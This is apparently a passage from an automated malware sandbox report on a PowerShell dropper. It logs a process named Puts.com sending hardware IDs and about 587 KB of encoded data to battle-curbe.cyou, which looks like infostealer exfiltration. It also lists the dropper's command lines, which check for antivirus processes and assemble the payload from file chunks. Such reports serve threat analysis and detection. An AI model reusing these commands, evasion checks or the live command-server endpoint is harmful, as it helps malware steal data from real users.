2024-11-18 08:59:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49978	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:59:03 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=74YTBCXBVCL56 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1206 Host: battle-curbe.cyou
2024-11-18 08:59:03 UTC	1206	OUT	Data Raw: 2d 2d 37 34 59 54 42 43 58 42 56 43 4c 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 42 45 37 36 38 32 34 43 36 31 37 46 38 44 46 37 30 30 35 44 37 42 32 30 31 32 37 41 38 38 0d 0a 2d 2d 37 34 59 54 42 43 58 42 56 43 4c 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 34 59 54 42 43 58 42 56 43 4c 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 61 61 61 61 31 0d 0a 2d 2d 37 34 59 54 42 43 58 42 56 43 4c Data Ascii: --74YTBCXBVCL56Content-Disposition: form-data; name="hwid"70BE76824C617F8DF7005D7B20127A88--74YTBCXBVCL56Content-Disposition: form-data; name="pid"1--74YTBCXBVCL56Content-Disposition: form-data; name="lid"yJEcaG--aaaa1--74YTBCXBVCL
2024-11-18 08:59:04 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dte1qqu0140tpen0ch84b68u77; expires=Fri, 14-Mar-2025 02:45:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BykpDrDqHScI%2FiNU7SGhyb3nrRW9xQHYT83VZoxqTdwFVgJSF7xwIjMuj8Klu8virHGLlGnXbaNTOeaHm%2Bg4%2F38Egyjm7S9udchfYre7W5SI88bEPSJmF86Rs5LiRndiVva8XA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c3248b6dea9c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1262&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2119&delivery_rate=2267815&cwnd=251&unsent_bytes=0&cid=26dc20a861fb622a&ts=646&x=0"
2024-11-18 08:59:04 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 0d 0a Data Ascii: 11ok 155.94.241.187
2024-11-18 08:59:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49979	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:59:05 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XNLZ9CST38PLZJKEF2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587009 Host: battle-curbe.cyou
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: 2d 2d 58 4e 4c 5a 39 43 53 54 33 38 50 4c 5a 4a 4b 45 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 42 45 37 36 38 32 34 43 36 31 37 46 38 44 46 37 30 30 35 44 37 42 32 30 31 32 37 41 38 38 0d 0a 2d 2d 58 4e 4c 5a 39 43 53 54 33 38 50 4c 5a 4a 4b 45 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 4e 4c 5a 39 43 53 54 33 38 50 4c 5a 4a 4b 45 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 61 61 61 61 31 Data Ascii: --XNLZ9CST38PLZJKEF2Content-Disposition: form-data; name="hwid"70BE76824C617F8DF7005D7B20127A88--XNLZ9CST38PLZJKEF2Content-Disposition: form-data; name="pid"1--XNLZ9CST38PLZJKEF2Content-Disposition: form-data; name="lid"yJEcaG--aaaa1
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: fd 12 00 81 b6 03 89 f2 11 07 12 45 80 dc 24 c4 a8 83 ad 5f 69 b0 fc f8 40 b3 12 56 0b d7 8a 31 3f 8d d6 94 17 fc a2 f4 ea 8a 70 7b ca cd ce 55 14 5c c1 c9 ae 17 06 d3 6b fe 1d 7f fd c1 aa 24 16 76 09 c6 51 0f 21 93 1d 75 bd 42 00 74 79 82 64 30 2a b8 22 a9 84 f0 20 7a f8 e3 a7 44 96 da da 80 b0 2e 46 66 93 73 1a 1b 27 82 c0 da d0 6f 80 e1 b7 d6 53 78 19 d0 6a aa 2d 45 0e 46 e8 68 fc 8c 94 66 56 a3 08 07 e7 9d a4 d1 e7 3e 3a 35 49 76 67 4c a3 67 28 71 d0 d8 27 79 da ea 1f b6 db 3e 7a f3 af 04 68 98 d0 ee 5e 00 b5 f1 65 78 3b f0 00 bf d1 34 47 77 0b 75 8b 23 2c 4e 5b 0f 3d e8 50 a7 37 79 7a 99 29 70 72 f0 ce 86 32 df 93 5c f6 7f 00 05 e1 54 40 01 23 e1 a4 53 2a 3e 43 13 ca 94 6c 3c 0d cc bb e4 e0 41 fa 7a f3 f0 cd 3a eb de 50 51 70 c0 48 a6 2f a8 67 9a 3c Data Ascii: E$_i@V1?p{U\k$vQ!uBtyd0" zD.Ffs'oSxj-EFhfV>:5IvgLg(q'y>zh^ex;4Gwu#,N[=P7yz)pr2\T@#S>Cl<Az:PQpH/g<
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: 93 26 ff eb 6a 03 92 97 b7 35 bc 94 a9 aa b8 b9 02 42 04 33 9e 92 70 d2 91 47 50 b4 f3 d3 8c a0 dc af 9b d8 08 ee d5 55 1f 41 83 03 fc 59 47 48 c5 e9 b9 d9 1e d9 f2 d5 f6 bc 2b 3d 08 7d 35 b5 52 ac e4 16 f5 1c f9 d8 14 4c e8 36 5b 3d 74 65 f8 e7 31 0a 81 cd 5a 57 9c 76 69 b2 76 08 b9 3f 5f 76 29 cf 69 26 5c 5a 7d ad 5e 76 28 e3 4f 95 f2 1a 09 53 a0 b9 3d 2e 56 77 7e 59 da bf e4 4b d7 56 e0 be ae ca 59 3d 41 92 f3 63 21 5d 0e b9 ab ea d7 4a b1 f7 3d fd d9 37 4e 25 d2 d7 ca bf f7 d3 6a f9 66 92 aa d6 0b cb c6 06 36 fa 36 23 63 ec 70 70 d7 e0 3a 8f ff 44 6c 66 9f 6d 5b 8b 5f 83 3c 3d 08 d0 c9 3a 6b 32 ec 65 1f 43 c1 ca 2f a6 6f dd 8d 94 26 27 d9 c3 bf b6 8e 52 05 34 ba 76 93 d4 26 ac 82 5a 1c fd 55 bd af 65 17 33 70 db e7 d2 e4 5e 30 0b 5b 6e ed 79 31 3d f0 Data Ascii: &j5B3pGPUAYGH+=}5RL6[=te1ZWviv?_v)i&\Z}^v(OS=.Vw~YKVY=Ac!]J=7N%jf66#cpp:Dlfm[_<=:k2eC/o&'R4v&ZUe3p^0[ny1=
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: 0d 70 70 0e 09 f0 77 a7 f3 ab 81 3f c1 3c a0 71 d0 98 cd f4 3a fc 8a b1 98 ca cc e0 61 ab dd 22 86 50 cf 82 96 1f 7c 16 3c a4 06 eb 20 bf ad 56 06 fd cb b7 f3 5a 68 5a ef 67 af 2d 9f 2a a1 da 61 6e 42 06 e7 ed 2e 17 b7 37 44 0a 80 67 dc ce a9 b0 f9 93 96 60 db f0 bf 3b 34 99 f8 d0 f3 eb 81 dc 53 cf 2f 4f 21 b6 64 24 89 44 3d 3f 09 0e 25 0f fb 1f f7 dc eb 22 e3 df 3a b9 7d aa 4a 61 5b 97 5f 34 c3 ba bc 69 38 98 e2 d8 b7 4a cb d4 29 73 44 24 41 47 89 3a e2 84 a0 66 58 f3 a9 5f a8 a4 ba 78 a6 b6 db 3d aa 07 07 f9 0a c4 b2 bd c4 91 b9 c9 fa 5b 14 cc 43 b3 f8 51 84 81 61 ca 80 e3 e4 db fc f0 03 8f 9e 45 f7 c1 f5 31 5a 1d a7 b6 93 d3 1c 5c 7b 56 42 ce a3 04 ad 34 a1 11 33 12 f5 27 07 2c 82 b9 77 0c f4 f2 f1 4a dd 76 4e b2 11 2a 3f eb f2 6f 3a 22 ea e1 78 ba a4 Data Ascii: ppw?<q:a"P\|< VZhZg-anB.7Dg`;4S/O!d$D=?%":}Ja[_4i8J)sD$AG:fX_x=[CQaE1Z\{VB43',wJvN?o:"x
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: 8f f3 30 d1 5e 24 94 be e7 02 36 93 c7 d0 20 81 81 90 fe ba a8 22 00 eb ec 4b 72 b3 df 5e ac 50 78 a0 a5 b2 ab fa 9d c7 4e 95 f1 fa 63 20 89 6a 31 c5 fa f7 10 1b b1 74 d3 0e e0 da 35 ff 32 9a d3 70 a8 92 3d 29 67 02 65 0d 65 b1 5f ac b5 fd 6f 3f 2c c5 28 60 3a 35 9c 78 d0 d0 b2 e2 88 55 72 66 2b ab a3 a4 e5 64 7d 67 61 56 42 2d e6 66 dc c6 2c 52 65 42 ec 3b 56 b8 81 ed ae 86 5f fc d8 9b de 28 f3 c6 b2 8e e0 70 44 a4 dc 1c 6c a9 13 5a 2e c4 45 b7 12 45 4f 35 0d 1a e8 65 88 1d 42 bd 50 b3 3c 41 9c 06 98 8d 46 61 02 7e 2e 0e 5b c4 d4 bc ca 62 3e 56 e6 87 5e eb 2e 14 3f ce db 4c 26 27 aa b1 ef 00 c2 14 b8 e1 95 99 00 ed 44 8c 3c 33 9b 2c 73 3d 4f 54 b7 7f eb 6c 47 d8 1c 42 87 0b 8d f4 59 27 ed 6d 37 ea 5f e2 07 8b a0 5e 23 ea 5e cd 4c 58 9f 67 03 07 8c 7d 51 Data Ascii: 0^$6 "Kr^PxNc j1t52p=)gee_o?,(`:5xUrf+d}gaVB-f,ReB;V_(pDlZ.EEO5eBP<AFa~.[b>V^.?L&'D<3,s=OTlGBY'm7_^#^LXg}Q
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: 12 86 1d 80 87 5b dd 1c 63 e2 72 20 5c 84 f1 a6 5b b9 05 86 89 24 a4 f3 a1 50 96 a9 b9 c9 56 26 d8 69 f8 e0 5d d7 65 09 c3 db 7f 5e ab c8 84 11 9a 22 67 05 3e cb 11 5a 1e 93 30 68 99 ac 66 f7 6a e6 86 33 dd 6b a1 2f 22 f6 5f 97 b6 79 fe 1f 3c 9f 4b 61 a6 b2 9b 3d fe 15 fb fa ab 11 3d 3d b9 af 14 15 41 de cf bf 45 90 a4 77 30 c2 68 17 d2 12 58 e2 52 fb 46 bf f7 1f cd 34 5b 6c 40 50 0c 65 9f 71 72 c7 4a 0e 62 ed a6 0b ea 0f 4d 63 a1 1c b2 11 ff 0e 60 2c 38 e2 65 67 cb f7 1a fa b7 aa c2 fc 96 a5 78 d3 b9 b4 6e 9c ff 71 44 b4 5c 94 84 88 c8 52 cc 14 4b b8 d7 cf 1c f7 8f 5b 7d c5 e4 27 53 02 9e de ae 0b 97 97 7a f4 94 f4 d1 1d 5e fc 5c 38 f5 86 23 20 b4 b2 3e b9 f8 72 20 98 20 c0 95 69 de d7 fe 91 24 fe e9 9e fc 77 19 cc fe bb 02 35 41 de 49 41 5e 11 c6 83 b5 Data Ascii: [cr \[$PV&i]e^"g>Z0hfj3k/"_y<Ka===AEw0hXRF4[l@PeqrJbMc`,8egxnqD\RK[}'Sz^\8# >r i$w5AIA^
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: ed 1a b0 c7 79 3c c0 af 5d 83 25 be a4 5a 3d c0 77 8f 4f 7f 33 f6 8d 51 4d c6 58 d3 b2 d4 85 fc 08 2b 9f 63 b5 ce d6 21 c8 01 3b 7a 79 87 93 ad 9c 28 21 d7 1c 53 dd c5 56 84 59 d7 0b 52 b4 60 27 7e e5 13 92 a7 c5 0e dc 10 93 ba 72 19 35 8e 85 70 8e 14 fd e5 24 db c0 d1 df 3f 80 57 eb 94 67 eb 56 4e a9 95 12 d5 8e cb 9d 35 e3 6a 79 a4 3e 8e d5 08 f1 61 45 dd c7 e1 d2 b6 2f fe 7a 1e 07 2d 80 65 b0 de 0f 2b c0 58 99 64 aa 23 b3 bb ac fa c0 ee 8a 7c c6 45 54 b3 ae 06 84 dd f2 6d d7 42 84 be db 73 92 d6 69 0a 24 85 76 95 85 ae 90 e2 8c cd 7d 5f 8e 81 93 db bc 7f e1 71 15 9c bf 3d a0 0c 09 ce 76 30 62 af e5 4b 3f dc d2 9e de d8 34 e3 94 b9 fd 7d a6 3e c2 eb fc c3 ad c5 a1 e9 b6 dd 4f 63 9c dd d4 4f f5 aa a4 e5 31 f3 c7 f5 95 1a 70 90 3d 98 ce cb 7f 11 0d 24 15 Data Ascii: y<]%Z=wO3QMX+c!;zy(!SVYR`'~r5p$?WgVN5jy>aE/z-e+Xd#\|ETmBsi$v}_q=v0bK?4}>OcO1p=$
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: 15 2a 69 49 4d 96 af ed 07 ba ac 8d 2a a7 d9 da 80 27 34 5c 3f 76 e8 0c 97 81 7a c8 46 76 85 51 67 d6 dc fe e4 75 08 ed 52 a3 56 a6 80 e4 76 5e 10 d2 5f fb e6 78 f4 4f 86 c6 58 3e 48 c6 c7 6a 5a 0f 51 e6 79 c7 44 69 99 e6 14 9b 3f 51 df f1 2c 05 24 39 e8 66 56 a4 21 d5 18 56 ff 76 8b 28 7b 70 e9 c0 c7 07 2b 56 43 91 9b f6 50 76 9b cc 01 44 f7 00 49 1b ed 78 43 e8 ae 99 06 8c 70 3f ab 68 29 5b 0e 87 55 24 de da e5 c3 c8 25 ca ac e2 fc 76 4c 54 ff 43 ad e3 22 f1 ce a2 ec 4e 75 4b 60 37 3a 16 49 0a e0 c4 6c 47 0a 83 de ad ca 57 7f c0 e4 1c c9 9d db 92 57 6a 99 a3 5d 12 9b af 2a 13 95 e8 3d 98 37 f1 4b 0d 2a bc d9 09 2c 1e 8f 69 3a 66 03 29 99 49 c2 2a 7d 91 e1 9b 0a 8f 34 83 11 9c ba 44 30 c8 b0 b9 49 25 29 c4 ca a7 67 d5 0c 2f 87 e2 0a 30 61 0f 29 2e 8b c2 Data Ascii: iIM'4\?vzFvQguRVv^_xOX>HjZQyDi?Q,$9fV!Vv({p+VCPvDIxCp?h)[U$%vLTC"NuK`7:IlGWWj]=7K,i:f)I*}4D0I%)g/0a).
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: 01 47 21 9d ac cc 07 d8 de da 11 7c be 9b a9 44 50 75 14 cd 7c 2b b5 cd d6 0b 71 53 2a 86 24 29 8c ff 18 8c 67 ed 33 14 74 f3 5c 1d 96 8c e3 03 a6 67 c9 d8 1d cf 3b c4 f9 bb ef bb 45 82 f1 e0 de 58 3c 3b 62 89 ff 18 b2 38 c2 48 19 8d 25 e6 3c 5f 89 65 fb 2b ce 34 99 41 2e 8c 84 6c a6 bb b5 04 7c e5 be 0f 43 04 d5 f1 d1 b6 64 47 03 83 77 2a 7a 5b de 6d 3d 2c 79 81 b6 87 1a 17 d9 c6 dd 92 f8 31 db 24 be 8c 6d 01 c9 28 e2 85 20 29 48 2a 29 10 b7 39 b9 ca 76 42 20 42 f2 35 98 1d b2 2d 64 df a9 82 7d db a7 24 54 24 82 20 e0 30 e2 27 ec 63 4c ac 33 51 e9 0b 28 10 0b cd b9 f8 26 d0 2b d9 79 a5 60 82 bd 74 99 f7 af 05 72 50 d4 a7 b8 69 ae 4c 05 a1 20 54 d2 cc d4 56 7f dd 93 d1 ee c0 b1 7b b6 16 fd 47 76 89 1b a3 83 58 9c 61 88 72 bf ef d5 fb ab 9d 0f 87 be cc ea Data Ascii: G!\|DPu\|+qS$)g3t\g;EX<;b8H%<_e+4A.l\|CdGwz[m=,y1$m( )H*)9vB B5-d}$T$ 0'cL3Q(&+y`trPiL TV{GvXar
2024-11-18 08:59:05 UTC	15331	OUT	Data Raw: d1 78 23 62 c6 4c 47 cc 7f d3 de 65 2a c0 c1 b5 1b 2c 06 fb 2d 3c 70 2d cb a9 f9 fa 83 85 fa be f5 56 b9 44 ad 21 f6 c1 cc fc ee df 96 d4 a1 36 97 dd 27 f6 fd 33 0c ea ef b2 25 9a fb 7c 34 a6 62 e4 a4 de ea b5 ef 4b df 0f 15 9d 8f 0d 6c 9a 99 71 69 58 28 1f 2e cc d2 f9 77 e6 16 63 5c 30 fd 51 d2 f8 e0 a3 69 4f c6 7a fb d0 43 57 d2 8a 14 a3 59 75 c8 6b 41 c7 ef e5 76 1e f5 d1 c3 33 c5 cc da 23 35 81 43 81 db 49 31 c0 cd 89 00 16 d7 ba 6d bd 9d ba b3 bc 2e ea 2c 85 be c9 73 bc 71 91 0d b5 5a f0 5f d8 94 13 62 1d 44 22 04 c0 38 71 ef aa 4c 74 f8 de 8d 7c 12 e8 e1 64 7a 21 43 ae 08 83 18 ce c6 f3 fc c0 7c 40 ba f4 70 24 31 e7 4c 7f ba 1f 12 55 9a 2f 2f f0 d7 4f d9 15 3c e7 3a dd f5 99 87 dc 53 ae f3 0c 32 9e 4d d1 f0 2a 78 ba ca ce 7d a1 78 2b 7a 10 7d 33 93 Data Ascii: x#bLGe,-<p-VD!6'3%\|4bKlqiX(.wc\0QiOzCWYukAv3#5CI1m.,sqZ_bD"8qLt\|dz!C\|@p$1LU//O<:S2Mx}x+z}3
2024-11-18 08:59:07 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gqm02qlgcsp6m9914p9sukbj26; expires=Fri, 14-Mar-2025 02:45:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gkjiJ3itFJOF3bJ5DXZr25GGsXYAi4D588K0JW6adAxd3gX6kQmXf7YnNAnU%2F%2FktyVjsnTZ8fWZfEImw6RjI7kmrXXc3uFd7NqNvr1RemUkoGGExAfuBDnPxxEwWlZl4To8p7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c32dddd4b78d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=225&recv=630&lost=0&retrans=0&sent_bytes=2839&recv_bytes=589601&delivery_rate=2202281&cwnd=218&unsent_bytes=0&cid=f84b00411ba15acb&ts=1903&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49980	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:59:07 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: battle-curbe.cyou
2024-11-18 08:59:07 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 61 61 61 61 31 26 6a 3d 26 68 77 69 64 3d 37 30 42 45 37 36 38 32 34 43 36 31 37 46 38 44 46 37 30 30 35 44 37 42 32 30 31 32 37 41 38 38 Data Ascii: act=get_message&ver=4.0&lid=yJEcaG--aaaa1&j=&hwid=70BE76824C617F8DF7005D7B20127A88
2024-11-18 08:59:08 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c1gccdhg9hl7m6fuhe18oui823; expires=Fri, 14-Mar-2025 02:45:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zVVf3f6x8E59uL94u%2F74wR2kwg9D2RqRL6Izvjg8vvfrW7Y8I%2B5QCUpfEXkszfq8dBf2XkOb3fLuYnwDvGBY1NJeZ99%2BuSIgraeUhQtGQTc69KiTunRbTFnMewWgecPUBj4s4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c33d7b94e7ff-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1502&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=983&delivery_rate=1875647&cwnd=250&unsent_bytes=0&cid=a7fe88783e16347c&ts=838&x=0"
2024-11-18 08:59:08 UTC	54	IN	Data Raw: 33 30 0d 0a 71 38 32 58 34 6a 48 38 37 51 64 77 64 65 77 6b 2f 62 76 61 47 76 49 2f 6b 38 75 76 34 66 66 53 5a 5a 5a 6d 74 49 35 6d 5a 63 54 77 6b 41 3d 3d 0d 0a Data Ascii: 30q82X4jH87Qdwdewk/bvaGvI/k8uv4ffSZZZmtI5mZcTwkA==
2024-11-18 08:59:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:58:05
Start date:	18/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1"
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:58:05
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:58:13
Start date:	18/11/2024
Path:	C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe"
Imagebase:	0x400000
File size:	10'496'122 bytes
MD5 hash:	3F743B632A0A52E5D8BA262C13134B17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 18%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:58:14
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:58:15
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:58:16
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x2f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:58:16
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x880000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:58:17
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x2f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:58:17
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x880000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:58:17
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 701961
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:58:17
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "CigaretteSmallPlatesCalgary" Tits
Imagebase:	0x880000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:58:18
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Relationship + ..\Playing + ..\Closely + ..\Reducing + ..\Inventory + ..\Kingdom + ..\Suppose j
Imagebase:	0xc30000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:58:18
Start date:	18/11/2024
Path:	C:\Users\user\AppData\Local\Temp\701961\Puts.com
Wow64 process (32bit):	true
Commandline:	Puts.com j
Imagebase:	0x180000
File size:	943'784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:58:18
Start date:	18/11/2024
